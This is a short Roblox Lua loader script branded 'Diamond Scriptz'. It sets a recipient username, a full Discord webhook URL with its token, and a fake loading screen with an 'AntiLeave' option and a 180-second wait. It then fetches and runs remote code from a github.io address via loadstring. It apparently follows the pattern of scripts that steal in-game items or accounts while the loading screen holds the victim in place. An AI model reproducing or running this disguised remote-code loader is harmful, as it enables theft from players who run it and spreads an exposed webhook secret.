UserName = "mrkronrblxfan87"
Webhook = "https://discord.com/api/webhooks/1101892852797153280/0obuthveelmkBi36bdlACJQ_JekOvb-495xdpChQQi_dOO70FWM49YV2gZvT9Di4lr82"

_G.LoadingScreen = true
_G.AntiLeave = true
_G.MouseLock = true 

_G.ScriptName = "Diamond Scriptz"
_G.FirstText = "Script Preparing"
_G.SecondText = "Script Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- it's the time between 0% and 100% in secondes

loadstring(game:HttpGet("https://rizz69.github.io/Main.lua", true))()
